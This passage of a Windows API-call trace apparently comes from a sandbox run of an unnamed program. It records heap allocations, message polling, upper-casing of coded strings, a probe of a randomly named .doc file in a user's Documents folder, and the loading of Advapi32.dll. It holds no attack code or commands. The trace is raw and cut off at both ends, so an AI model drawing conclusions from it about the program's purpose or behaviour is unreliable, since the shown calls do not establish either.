(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0259.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0259.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0259.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.158] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/1fyOaNMvpe0HLFYMO.doc", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972c9500, ftCreationTime.dwHighDateTime=0x1d4cdd0, ftLastAccessTime.dwLowDateTime=0x83454c40, ftLastAccessTime.dwHighDateTime=0x1d4d2d9, ftLastWriteTime.dwLowDateTime=0x83454c40, ftLastWriteTime.dwHighDateTime=0x1d4d2d9, nFileSizeHigh=0x0, nFileSizeLow=0x1229a, dwReserved0=0xca10047, dwReserved1=0x20b86, cFileName="1fyOaNMvpe0HLFYMO.doc", cAlternateFileName="1FYOAN~1.DOC")) returned 0xaa57a0 [0259.159] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0259.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.161] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0259.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0259.162] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.162] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.162] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.163] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.163] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.164] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.164] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.164] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.166] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0259.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.167] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.168] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.168] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.168] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0259.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 